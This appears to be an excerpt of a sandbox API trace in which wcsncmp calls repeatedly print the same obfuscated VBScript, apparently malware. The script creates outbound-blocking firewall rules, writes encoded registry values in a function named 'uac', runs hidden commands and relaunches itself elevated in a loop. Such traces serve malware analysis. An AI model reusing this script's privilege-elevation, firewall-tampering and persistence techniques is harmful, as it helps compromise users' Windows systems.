bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.343] wcsncmp (_String1="ach rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0226.343] wcsncmp (_String1="ch rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.343] wcsncmp (_String1="h rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0226.343] wcsncmp (_String1=" rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.344] wcsncmp (_String1="rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run 